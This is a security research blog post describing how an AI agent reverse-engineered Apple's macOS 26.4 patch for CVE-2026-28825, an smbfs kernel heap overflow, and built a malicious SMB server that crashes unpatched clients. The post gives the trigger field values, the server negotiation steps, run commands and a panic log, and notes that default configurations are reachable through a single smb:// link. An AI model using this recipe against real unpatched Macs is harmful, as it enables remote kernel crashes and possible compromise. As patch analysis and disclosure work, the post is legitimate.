MAD Bugs: An Apple Kernel Bug, Brought to You by Microsoft

Autonomous N-day analysis of CVE-2026-28825.

Apr 22, 2026

This post is part of MAD Bugs, our Month of AI-Discovered Bugs, where we pair frontier models with human expertise and publish whatever falls out.

At Calif we spend an unhealthy amount of time picking apart Apple security updates and beta releases. Today we want to highlight CVE-2026-28825, a kernel heap out-of-bounds write in smbfs.kext that Apple patched in macOS 26.4, and share how we used Claude to analyze and reproduce it.

Throughout this analysis you will notice that the data comes from ipsw, IDA, MS-SMB2, and XNU, which is nothing unusual; people have been bindiffing Apple updates since roughly the invention of the apple. The interesting part is that the agent did this autonomously using our in-house harness, driving the same tools a human researcher would, with no human intervention between "here's a URL" and "here's a kernel panic."

What follows is a human-annotated version of what the AI did. Our commentary is in italics, mostly so you can tell which parts are us being smug and which parts are the robot being smart.

The setup

So far in this MAD Bugs series we've mostly asked models to find new bugs. This time we wanted to flip it around: given nothing but a vendor advisory, can an agent reconstruct the bug and produce a working trigger? Can AI do the N-day grind so we don't have to?

We gave Claude a host running macOS 26.4, a 26.3.2 VM to bully, our Calif harness (which is first-rate duct tape around ipsw, tart, and headless IDA), and one prompt:

we are going to try and triage and write n-day PoC exploits for the latest macOS 26.4 (which is the same as the host you are running on) here is the apple security notes - https://support.apple.com/en-us/126794 create a plan/TODO list with an item for EACH of these so we can research them one-by-one and create a list of the MOST interesting/highest impact ones to look into and then we will do deep dives on each and create exploit PoCs for each do you understand? ask any clarifying questions now

That's it. We then went to the gym and absolutely did not spend the entire time refreshing the Claude session log on our phones.

The vulnerability

The macOS 26.4 security notes list a few dozen CVEs across the usual lineup: WebKit, Kernel, AppleMobileFileIntegrity, CoreAudio, the gang's all here.

Claude dutifully built a TODO for each one, ranked them, and reproduced two of the SMB entries. The trigger for what we believe is CVE-2026-28835 turned out to be flaky, so this post focuses on the other one, which we believe is CVE-2026-28825:

Available for: macOS Tahoe
Impact: An app may be able to modify protected parts of the file system
Description: An out-of-bounds write issue was addressed with improved bounds checking.
CVE-2026-28825: Sreejith Krishnan R

A caveat on those CVE numbers: the advisory has several SMB entries with near-identical wording, and Apple does not tell you which line maps to which function, so our mapping from "this cmp/b.hi in smb2_rq_decompress_read" to "CVE-2026-28825" is best-effort. The vulnerability is real and verified against a 26.3.2 kernel.

In hindsight it's a sensible pick. "Out-of-bounds write … improved bounds checking" usually means a single inserted compare-and-branch, which is about the cleanest bindiff signal you can hope for; smbfs ships in the boot kernelcache, so both versions can be carved out with ipsw and diffed as a single binary rather than chased across two dyld shared caches; and SMB is a network filesystem, so whatever "an app" is doing to trigger this, a server on the other end of a socket can probably do too. The agent's initial assessment was that the PoC would amount to "a Python server," which turned out to be doing a tremendous amount of work, but we'll get there.

The patch

Claude pulled both kernelcaches and carved out the smbfs kext. If you want to follow along at home, ipsw will fetch just the kernelcache out of Apple's CDN without making you download the full multi-GB restore image:

# 26.3.2 is no longer signed, so use the appledb index rather than ipsw.me
ipsw download appledb --os macOS --device VirtualMac2,1 --build 25D2140 --kernel -y -o old
ipsw download appledb --os macOS --device VirtualMac2,1 --build 25E246  --kernel -y -o new

# carve smbfs out of each kernelcache
ipsw kernel extract old/25D2140__VirtualMac2,1/kernelcache.release.VirtualMac2,1 \
    com.apple.filesystems.smbfs -o old
ipsw kernel extract new/25E246__VirtualMac2,1/kernelcache.release.VirtualMac2,1 \
    com.apple.filesystems.smbfs -o new

Then, rather than diffing every function like some kind of animal, it did what every reverser does first and diffed the strings. ipsw macho info --strings prefixes each line with its load address, which moves between builds, so strip that and sort before comparing:

diff <(ipsw macho info old/com.apple.filesystems.smbfs --strings --no-color | sed 's/^0x[0-9a-f]*: //' | sort) \
     <(ipsw macho info new/com.apple.filesystems.smbfs --strings --no-color | sed 's/^0x[0-9a-f]*: //' | sort)

And Apple, bless them, had left a little present:

296a297
> "%s: compress_len %u > originalCompressedSegmentSize %u \n"
546a548
> "%s: Freeing con with unexpected state of 0x%x?"

A brand-new error string of the form "X > Y" appearing in a security update is the bindiff equivalent of a neon sign that says BUG WAS HERE. The string's only xref is inside smb2_rq_decompress_read, the function had grown by exactly 60 bytes between versions, and the entire delta was this:

; macOS 26.4, smb2_rq_decompress_read +0x6d4
loc_fffffe0009b7cb9c:
    cmp   w9, w8                ; w9 = compress_len, w8 = OriginalCompressedSegmentSize
    b.hi  loc_fffffe0009b7cdec  ; → log the new string, return EBADRPC
    mov   w2, w9
    ...
    bl    _md_get_mem

So the fix is "before copying compress_len bytes into a buffer, check that compress_len fits in the buffer," and you can probably guess what the bug is.

The root cause

This is where it usually gets slow for humans, because smb2_rq_decompress_read is ~800 instructions of nested header parsing for the SMB 3.1.1 compression transform. SMB 3.1.1 actually defines two flavours of that transform: unchained (MS-SMB2 §2.2.42.1), which is one header followed by one compressed blob, and chained (§2.2.42.2), which is one outer header followed by a list of payload chunks, each carrying its own algorithm and length so different slices of the same message can be compressed differently. Apple's parser handles both in one function, splitting on a session flag, and the bug lives in the chained branch.

The agent had to work out which branch was which from the disassembly alone, which meant matching the field layouts each arm parses against §2.2.42.1 vs §2.2.42.2 until one of them lined up. This is precisely what a human would do, minus the part where the human opens fourteen browser tabs of Microsoft Learn and emerges three hours later unsure whether the Strait of Hormuz remains closed.
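To make the two layouts concrete, here is a minimal Python sketch of both header shapes as we read them in MS-SMB2 §2.2.42.1 and §2.2.42.2. The function names, the dictionary keys, and the sample frame are ours and purely illustrative; this is not Apple's parser and not the agent's code. Note the bounds check on each chunk's Length, which a careful parser would want.

```python
import struct

PROTOCOL_ID = b"\xfcSMB"  # compression transform magic

# Algorithm IDs whose payload header carries an OriginalPayloadSize field
# (LZNT1, LZ77, LZ77+Huffman, LZ4), per our reading of MS-SMB2 2.2.42.2.
SIZED_ALGORITHMS = {0x0001, 0x0002, 0x0003, 0x0005}

def parse_unchained(frame):
    """One header, one blob: ProtocolId, OCSS, Algorithm, Flags, Offset."""
    magic, ocss, algorithm, flags, offset = struct.unpack_from("<4sIHHI", frame, 0)
    if magic != PROTOCOL_ID:
        raise ValueError("not a compression transform frame")
    return {"ocss": ocss, "algorithm": algorithm, "flags": flags,
            "offset": offset, "data": frame[16:]}

def parse_chained(frame):
    """One outer header, then a list of chunks with their own algorithm and Length."""
    magic, ocss = struct.unpack_from("<4sI", frame, 0)
    if magic != PROTOCOL_ID:
        raise ValueError("not a compression transform frame")
    chunks, pos = [], 8
    while pos < len(frame):
        algorithm, flags, length = struct.unpack_from("<HHI", frame, pos)
        pos += 8
        original_size = None
        if algorithm in SIZED_ALGORITHMS:
            # Length covers the 4-byte OriginalPayloadSize plus the payload.
            if length < 4:
                raise ValueError("Length too small for OriginalPayloadSize")
            (original_size,) = struct.unpack_from("<I", frame, pos)
            pos += 4
            length -= 4
        if pos + length > len(frame):
            raise ValueError("chunk Length runs past the end of the frame")
        chunks.append({"algorithm": algorithm, "flags": flags,
                       "original_size": original_size,
                       "data": frame[pos:pos + length]})
        pos += length
    return ocss, chunks

# Illustrative frame: one LZ77+Huffman chunk, then one uncompressed chunk.
frame = (PROTOCOL_ID + struct.pack("<I", 0x100)
         + struct.pack("<HHII", 0x0003, 0x0001, 4 + 3, 0x80) + b"abc"
         + struct.pack("<HHI", 0x0000, 0x0000, 2) + b"hi")
ocss, chunks = parse_chained(frame)
```

The detail that matters later is that Length, for the sized algorithms, includes the 4-byte OriginalPayloadSize field, which is why the disassembly subtracts 4 before copying.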

The agent's full disasm walkthrough is in agent/ANALYSIS.md; here's the fun part. When the smbfs client receives a frame starting with \xfcSMB, it parses the outer transform header and allocates a scratch buffer:

; OriginalCompressedSegmentSize from the wire → [sp+0x4c], capped only at 8 MiB
:206  lsl   w19, w8, #0x1        ; w19 = OCSS * 2
:209  bl    <kalloc_data>        ; alloc(2 * OCSS)   ← attacker picks the zone, how thoughtful
:211  mov   x20, x0
:218  add   x23, x20, x8         ; output half = x20 + OCSS

The buffer is 2 × OriginalCompressedSegmentSize: front half for compressed input, back half for decompressed output. OriginalCompressedSegmentSize comes straight off the wire with only an 8 MiB cap, which means the attacker gets to pick which kalloc zone this lands in.
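The sizing logic is small enough to model directly. The sketch below assumes only what the disassembly shows (an 8 MiB cap and a 2 × OCSS allocation split into two halves); the power-of-two rounding in assumed_size_class is our simplification for small sizes, not a description of how XNU actually picks a zone, and all names are hypothetical.

```python
MAX_OCSS = 8 * 1024 * 1024  # the 8 MiB cap noted in the disassembly

def scratch_layout(ocss):
    """Model the scratch buffer: input half first, output half second."""
    if ocss > MAX_OCSS:
        raise ValueError("OriginalCompressedSegmentSize above the 8 MiB cap")
    total = 2 * ocss
    return {"total": total,
            "input_half": (0, ocss),        # compressed bytes land here
            "output_half": (ocss, total)}   # decompressed bytes land here

def assumed_size_class(nbytes):
    """ASSUMPTION: round up to the next power of two (minimum 16).

    Real kalloc size classes are finer-grained and large requests do not
    come from a zone at all; this is only a rough guide for small sizes.
    """
    size = 16
    while size < nbytes:
        size *= 2
    return size

layout = scratch_layout(0x100)
size_class = assumed_size_class(layout["total"])
print(hex(layout["total"]), size_class)
```

Because the server chooses OCSS, it also chooses the total, and with it (roughly) which neighbours the buffer ends up next to.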

Then it loops over chained payload chunks, and each chunk header has two attacker-controlled sizes: OriginalPayloadSize (how big this chunk will be after decompression) and Length (how many compressed bytes are on the wire right now). Watch carefully:

:567  bl    _md_get_uint32le      ; OriginalPayloadSize → [sp+0x3c]
:585  ldr   w8, [sp, #0x3c]       ; OriginalPayloadSize
:587  sub   w9, w9, w24           ; remaining output budget
:588  cmp   w8, w9
:589  b.hi  error                 ; ✓ decompressed size fits in output half? great!

:590  ldr   w9, [sp, #0x44]       ; Length
:591  subs  w8, w9, #0x4          ; compress_len = Length - 4
:610  mov   w2, w8                ; size = compress_len   ← wait, nobody checked this one
:612  mov   x1, x20               ; dst  = the OCSS-byte input half
:614  bl    _md_get_mem           ; memcpy(heap, wire, compress_len)  ← oh no

It carefully validates that the decompressed size will fit in the output half, then copies the compressed bytes into the input half without checking their length at all. The only constraint on Length is "are there that many bytes left in the mbuf chain?", and since we're the server, there are exactly as many bytes as we feel like sending.

So the recipe writes itself: send OriginalCompressedSegmentSize = 0x100 to get a cute little kalloc(0x200) buffer, send OriginalPayloadSize = 0x80 to pat the bouncer on the head, then send Length = 0x10000 followed by 64 KiB of 0x41. The md_get_mem call happily writes 0xFFFC bytes into a 512-byte allocation and keeps on trucking through whatever's next door.
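For anyone who wants the arithmetic spelled out, here is a small Python model of the vulnerable 26.3.2 path using the numbers above. It mirrors only the checks visible in the excerpt; the function name is hypothetical, and the Length < 4 guard is our assumption about what the subs result feeds, since that part of the listing is elided.

```python
def vulnerable_copy_len(remaining_output, original_payload_size, length):
    """Return how many bytes the unpatched path copies into the input half."""
    # The one check the 26.3.2 code does make: decompressed size vs output budget.
    if original_payload_size > remaining_output:
        raise ValueError("OriginalPayloadSize exceeds remaining output budget")
    # ASSUMPTION: an underflowing Length is rejected (not shown in the excerpt).
    if length < 4:
        raise ValueError("Length smaller than the OriginalPayloadSize field")
    # compress_len = Length - 4, and nothing compares it to the buffer size.
    return length - 4

ocss = 0x100
allocation = 2 * ocss                       # 0x200, the whole scratch buffer
copied = vulnerable_copy_len(remaining_output=ocss,
                             original_payload_size=0x80,
                             length=0x10000)
past_input_half = copied - ocss             # bytes beyond the 0x100-byte input half
past_allocation = copied - allocation       # bytes beyond the 512-byte allocation

print(hex(copied), hex(past_input_half), hex(past_allocation))
```

In other words, the copy first tramples the buffer's own output half and then carries on well past the end of the 512-byte element.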

The catch (that wasn't)

While tracing the dispatch path in smb_iod_recvall, Claude found a gate in front of the vulnerable function:

ldr  w8, [session+0x620]   ; negotiated compression algorithm bitmap
cbz  w8, normal_parse      ; if 0, never reach smb2_rq_decompress_read

It then went looking for what controls that field, found the comp_algorithms_map option in nsmb.conf (default 0), and concluded the bug was only reachable if the victim had gone out of their way to enable SMB compression. That assessment is baked into agent/ANALYSIS.md, agent/README.md, and the warning server.py prints when the client doesn't offer a compression context. On that basis the agent wrote this up as a lab curiosity rather than something you'd worry about in the wild.

Hold that thought.

The PoC

The actual overflow payload, build_overflow_payload(), is about 25 lines. The other ~750 lines of server.py are the agent slowly discovering that mount_smbfs is an extremely picky conversational partner. Here is what macOS demands before it will deign to issue a READ:

Multi-protocol negotiate: an SMB1 0xFF SMB hello answered with an SMB2 wildcard, like it's 2006.
NEGOTIATE: dialect 0x0311, a preauth integrity context, and the compression context with COMPR_FLAG_CHAINED + LZ77_HUFFMAN that makes any of this reachable in the first place.
SESSION_SETUP ×2: raw NTLMSSP Type-1/2/3, not SPNEGO-wrapped, because macOS 26 decided SPNEGO is for other people.
TREE_CONNECT: ShareType=DISK, full access, no questions asked.
Compounded CREATE/QUERY_INFO/CLOSE: mount-time probes chained via NextCommand, because one request at a time is for cowards.
IOCTL FSCTL_VALIDATE_NEGOTIATE_INFO: echo the negotiate parameters back so the client doesn't accuse us of MITM'ing ourselves.
QUERY_DIRECTORY info_class=0x25: a FileIdBothDirectoryInformation entry saying yes, there's totally a 1 MiB file here.
READ: finally, finally, build_overflow_payload().
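The compounding step is the one that tends to trip up hand-rolled servers, so here is a hedged sketch of how a server might split a compounded request on NextCommand. It relies on the standard 64-byte SMB2 header layout (Command at offset 12, NextCommand at offset 20); split_compound and fake_request are hypothetical names of ours and are not taken from server.py.

```python
import struct

SMB2_MAGIC = b"\xfeSMB"
HEADER_LEN = 64
COMMANDS = {0x0000: "NEGOTIATE", 0x0001: "SESSION_SETUP", 0x0003: "TREE_CONNECT",
            0x0005: "CREATE", 0x0006: "CLOSE", 0x0008: "READ", 0x000B: "IOCTL",
            0x000E: "QUERY_DIRECTORY", 0x0010: "QUERY_INFO"}

def split_compound(buf):
    """Split a compounded SMB2 message into (command name, bytes) pairs."""
    requests, pos = [], 0
    while True:
        if len(buf) - pos < HEADER_LEN or buf[pos:pos + 4] != SMB2_MAGIC:
            raise ValueError("truncated or non-SMB2 header")
        (command,) = struct.unpack_from("<H", buf, pos + 12)
        (next_command,) = struct.unpack_from("<I", buf, pos + 20)
        if next_command and next_command < HEADER_LEN:
            raise ValueError("NextCommand points inside the current header")
        # NextCommand is an offset from the start of this header; 0 means last.
        end = pos + next_command if next_command else len(buf)
        if end > len(buf):
            raise ValueError("NextCommand runs past the end of the message")
        requests.append((COMMANDS.get(command, hex(command)), buf[pos:end]))
        if not next_command:
            return requests
        pos = end

def fake_request(command, next_command, body=b""):
    """Illustrative helper: a zeroed header with only the fields read above."""
    header = bytearray(HEADER_LEN)
    header[0:4] = SMB2_MAGIC
    struct.pack_into("<H", header, 4, 64)            # StructureSize
    struct.pack_into("<H", header, 12, command)      # Command
    struct.pack_into("<I", header, 20, next_command) # NextCommand
    return bytes(header) + body

# The mount-time probe shape described above: CREATE, QUERY_INFO, CLOSE.
compound = (fake_request(0x0005, 72, b"\x00" * 8)
            + fake_request(0x0010, 72, b"\x00" * 8)
            + fake_request(0x0006, 0))
names = [name for name, _ in split_compound(compound)]
print(names)
```

A real server also has to answer each piece and chain the responses the same way, which is presumably where a good share of those ~750 lines went.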

This stage is where most of the wall-clock time went, though "most" is relative: the whole thing from advisory to confirmed panic was a few hours. You can reconstruct the wall-hitting from the artifacts: the client hangs up at SESSION_SETUP because macOS sends raw NTLMSSP rather than SPNEGO, then the compounded NextCommand mount-time probes need handling, then QUERY_DIRECTORY turns out to want info class 0x25 (FileIdBothDirectoryInformation), and so on. The troubleshooting section of the agent's README and the test log at the bottom of it are basically the therapy journal.

# attacker
sudo python3 server.py --host 0.0.0.0

# victim VM
mkdir -p /tmp/m
mount_smbfs -N //guest@<attacker-ip>/poc /tmp/m

The panic

In our testing the target panics immediately on mount; you don't even get your shell prompt back before the VM stops being a VM and starts being a very expensive paperweight.

panic(cpu 0 caller 0xfffffe0041ad1bb8): Kernel data abort. at pc 0xfffffe0041ad858c, lr 0x19c2fe0044ad2340 (saved state: 0xfffffeab785478a0)
      x0:  0xfffffe32db26bc64 x1:  0xfffffe393878c438  x2:  0x0000000000003b74  x3:  0xfffffe32db26c000
      x4:  0x0000000000000000 x5:  0x000000000000001c  x6:  0x0000000000000041  x7:  0x0000310353f6f896
      x8:  0x4141414141414141 x9:  0x4141414141414141  x10: 0x4141414141414141  x11: 0x4141414141414141
      x12: 0x4141414141414141 x13: 0x4141414141414141  x14: 0x4141414141414141  x15: 0x4141414141414141
      x16: 0x0000000000003fb0 x17: 0x8b6bfe0045015c00  x18: 0x0000000000000000  x19: 0x000000000000fffc
      x20: 0xfffffeab78547cf0 x21: 0x0000000000000000  x22: 0xfffffe1bad1de000  x23: 0xfffffe32db26bc64
      x24: 0x0000000000003f50 x25: 0xfffffe393878c07c  x26: 0x000000000000ff98  x27: 0xfffffe00453753a0
      x28: 0xfffffe1ba74efac8 fp:  0xfffffeab78547bf0  lr:  0x19c2fe0044ad2340  sp:  0xfffffeab78547bf0
      pc:  0xfffffe0041ad858c cpsr: 0x20401208         esr: 0x0000000096000047  far: 0xfffffe32db26c000

Probabilistic GZAlloc Report:
  Zone    : data_shared.kalloc.512
  Address : 0xfffffe32db26c000
  Element : [0xfffffe32db26be00, 0xfffffe32db26c000) of size 512
  Kind    : out-of-bounds (high confidence)
  Access  : 1 byte(s) past

That's eight general-purpose registers screaming AAAAAAAA in unison, x19 still holding our 0xfffc copy length, x6 holding the spray byte, and PGZ politely noting an out-of-bounds write past a 512-byte element in data_shared.kalloc.512, which is exactly where kalloc_data(2 × 0x100) lands.
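If you would rather not decode the syndrome register by eye, the few lines below pull the relevant fields out of the esr value and cross-check far against the PGZ element bounds. The bit positions follow the Arm architecture's ESR layout for data aborts (EC in bits 31:26, WnR in bit 6, DFSC in bits 5:0); the function and variable names are ours.

```python
def decode_esr(esr):
    """Extract the exception class and data-abort fields from an ESR value."""
    ec = (esr >> 26) & 0x3F          # exception class
    iss = esr & 0x1FFFFFF            # instruction-specific syndrome
    return {"ec": ec,
            "data_abort_same_el": ec == 0x25,  # data abort, no EL change
            "is_write": bool(iss & (1 << 6)),  # WnR: 1 = write
            "dfsc": iss & 0x3F}                # fault status code

info = decode_esr(0x96000047)

# Values copied from the panic log and PGZ report above.
far = 0xFFFFFE32DB26C000
element_start, element_size = 0xFFFFFE32DB26BE00, 512
element_end = element_start + element_size

print(info, far == element_end)
```

The fault is a write from kernel mode, and the faulting address is exactly the first byte after the 512-byte element, which lines up with PGZ's "1 byte(s) past".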

The human expertise

This is where the autonomous run ended and we picked it up. The agent had handed us a working PoC with one asterisk attached: "non-default config required, victim must set comp_algorithms_map in nsmb.conf." We wanted to know how critical that asterisk really was, so we did the laziest possible experiment: deleted the nsmb.conf provisioning from the trigger script, pointed it at a fresh, never-configured 26.3.2 VM, and ran it.

It panicked anyway. 100% of the time.

So much for the asterisk. Conveniently, Apple publishes the SMB client source at apple-oss-distributions/SMBClient, so we don't even have to argue from disassembly.

To be clear, "we" here still means Claude. Our contribution to this section was deleting three lines from a shell script and typing "huh, why did that work?" into a chat box. The manual source-code audit that follows, like every other piece of manual labor in this post, is the model's work; we don't read C by hand anymore, we are not farmers.

There are two places smbfs touches compression at negotiate time, and they are not symmetric:

smb2_smb_add_negotiate_contexts builds the client's outgoing NEGOTIATE request. This is where comp_algorithms_map matters: with the default of 0, the client doesn't include an SMB2_COMPRESSION_CAPABILITIES context in what it sends. The agent traced this side, saw the config gate, and stopped.
smb2_smb_parse_negotiate_contexts parses the server's NEGOTIATE response, and it has no such gate. From smb_smb_2.c:

/* Get CompressionAlgorithms */
for (i = 0; i < compression_algorithm_cnt; i++) {
    error = md_get_uint16le(&md_context_shadow, &compression_algorithm);
    ...
    switch(compression_algorithm) {
        case SMB2_COMPRESSION_LZ77_HUFFMAN:
            sessionp->server_compression_algorithms_map |= SMB2_COMPRESSION_LZ77_HUFFMAN_ENABLED;
            break;
        case SMB2_COMPRESSION_LZ77:
            sessionp->server_compression_algorithms_map |= SMB2_COMPRESSION_LZ77_ENABLED;
            break;
        ...
    }
}

There is no intersection check against the client's own algorithm map. The client never asked for compression, the server says "we'll be using LZ77+Huffman, thanks," and the client just writes it down. (The encryption and signing arms of the same switch do validate the server's choice; compression alone does not. There is even a stale comment a few lines up reading "We do not support compression, so can ignore this reply," presumably left over from before compression support was bolted on.) From that point on server_compression_algorithms_map, which is the field at [session+0x620], is non-zero, the dispatch gate in smb_iod_recvall is satisfied, and every \xfcSMB frame goes straight to smb2_rq_decompress_read.
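The asymmetry is easier to see in a toy model. The sketch below contrasts the response parsing as described above with a hypothetical variant that intersects the server's list with the client's own map. The algorithm IDs are the MS-SMB2 values; the bit values and every function name are placeholders of ours, and the intersecting variant is not what Apple shipped (the 26.4 fix is the bounds check in smb2_rq_decompress_read).

```python
SMB2_COMPRESSION_LZ77 = 0x0002
SMB2_COMPRESSION_LZ77_HUFFMAN = 0x0003

# ASSUMPTION: placeholder bit values, not the real *_ENABLED constants.
ENABLED_BIT = {SMB2_COMPRESSION_LZ77: 0x1,
               SMB2_COMPRESSION_LZ77_HUFFMAN: 0x2}

def parse_as_described(server_algorithms):
    """Record whatever the server lists, with no reference to the client's map."""
    server_map = 0
    for algorithm in server_algorithms:
        server_map |= ENABLED_BIT.get(algorithm, 0)
    return server_map

def parse_with_intersection(server_algorithms, client_map):
    """Hypothetical hardening: keep only algorithms the client itself offered."""
    return parse_as_described(server_algorithms) & client_map

def reaches_decompress(server_map):
    """Model of the dispatch gate: non-zero map means frames get decompressed."""
    return server_map != 0

client_map = 0  # comp_algorithms_map default: client offers no compression
server_says = [SMB2_COMPRESSION_LZ77_HUFFMAN]

as_described = reaches_decompress(parse_as_described(server_says))
intersected = reaches_decompress(parse_with_intersection(server_says, client_map))
print(as_described, intersected)
```

With the default client map of 0, the first variant opens the gate and the second keeps it shut, which is the whole difference between "lab curiosity" and "mount any share".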

The Microsoft connection

While we had the source open we also found out why the bug exists in the first place, and it's too good not to share. Right above the missing check, in smb_crypt.c:

#if 0
    /*
     * Oddly, Windows server will send a compress length that
     * is bigger than the decompressed length which will cause
     * this check to fail. Why they dont just send the non
     * compressed data?
     *
     * Sanity check the compress length
     */
    if (compress_len > (originalCompressedSegmentSize - CurrentDecompressedDataSize)) {
        SMBERROR("Algorithm %d compress_len %d > remaining to decompress len %d? \n", ...);
        error = EINVAL;
        goto bad;
    }
#endif

The bounds check was there. Someone #if 0'd it out because Windows Server tripped it, left a slightly exasperated comment, and shipped. The 26.4 fix doesn't re-enable this block; it adds a looser check further down that's tight enough to stop the overflow but slack enough to keep Windows happy. (If you want to diff it yourself: vulnerable through tag SMBClient-532.80.3, fixed in SMBClient-538.100.12.)
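To see why the looser check threads that needle, compare the two predicates side by side. The strict form is taken from the #if 0 block; the loose form is our reading of the 26.4 cmp/b.hi and its new error string. The first set of sample numbers is made up to illustrate the situation the source comment complains about, and the function names are hypothetical.

```python
def disabled_check_rejects(compress_len, ocss, current_decompressed):
    """The #if 0'd check: compare against what is left to decompress."""
    return compress_len > (ocss - current_decompressed)

def shipped_check_rejects(compress_len, ocss):
    """Our reading of the 26.4 check: compare against the input half's size."""
    return compress_len > ocss

# Illustrative case: a late chunk that compressed badly, so its compressed
# length exceeds the remaining decompressed length (values are invented).
late_chunk = dict(compress_len=0x180, ocss=0x1000, current_decompressed=0xF00)
strict_on_late = disabled_check_rejects(**late_chunk)
loose_on_late = shipped_check_rejects(late_chunk["compress_len"], late_chunk["ocss"])

# The overflow recipe from earlier in the post.
strict_on_attack = disabled_check_rejects(0xFFFC, 0x100, 0)
loose_on_attack = shipped_check_rejects(0xFFFC, 0x100)

print(strict_on_late, loose_on_late, strict_on_attack, loose_on_attack)
```

The strict check rejects both cases, which is what annoyed whoever was testing against Windows Server; the loose one lets the awkward-but-harmless chunk through and still stops the oversized copy.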

We asked Claude whether it laughed when it found that comment. It claimed it "doesn't experience humor the way humans do" and then blamed Microsoft for the bug, which as Apple fanbois we found to be very relatable.

Conclusion

To be clear about scope: we didn't ask Claude to find this bug, and it didn't. Credit for the discovery goes to Sreejith Krishnan R. What we asked Claude to do was the N-day grind: take a one-line advisory and a pair of kernelcaches, reverse-engineer the fix, work out the root cause, and build something that triggers it. That part ran end to end without a human opening IDA, and the gap between "Apple ships a patch" and "someone has a working trigger" just got a lot shorter.

The reachability miss is, if anything, the more interesting result. The agent assessed this as "gated behind a config nobody sets"; in reality it's "mount any share the attacker controls," which on macOS is a single click on an smb:// link in Finder, Safari, or Messages. That's a meaningful swing in severity, and it tells you something about where the model is today: the taint tracking, the protocol scaffolding, the eight-stage SMB state machine were flawless, and the one thing it got wrong was a judgment call about which of two sibling functions controls a gate, where it stopped one xref short of the answer. That's exactly the kind of gap a human reviewer closes in ten minutes once the machine has done the other ninety-five percent, which is more or less the thesis of this whole series.

Everything the agent produced lives unedited under agent/ in the repo: README.md, ANALYSIS.md, REPORT.md, plus server.py at the top level. You'll see the "non-default comp_algorithms_map required" claim stated as fact throughout, because that's what the agent believed when it wrote them. We've left it that way on purpose; the unedited record of where it was right and where it was wrong is more useful than a cleaned-up one. The panic logs are in panics/.

your_friend

Apr 23

Very cool! And a very reasonable place for LLM to be able to find a bug, I must say.

Two questions, if I may:

1) Have you tried feeding it two patches without patch log and if you did what were the results?

2) What's your usual churn on these tasks? Like do you have ~ 100/1 ratio of unsuccessful passes to successful or 1/1?

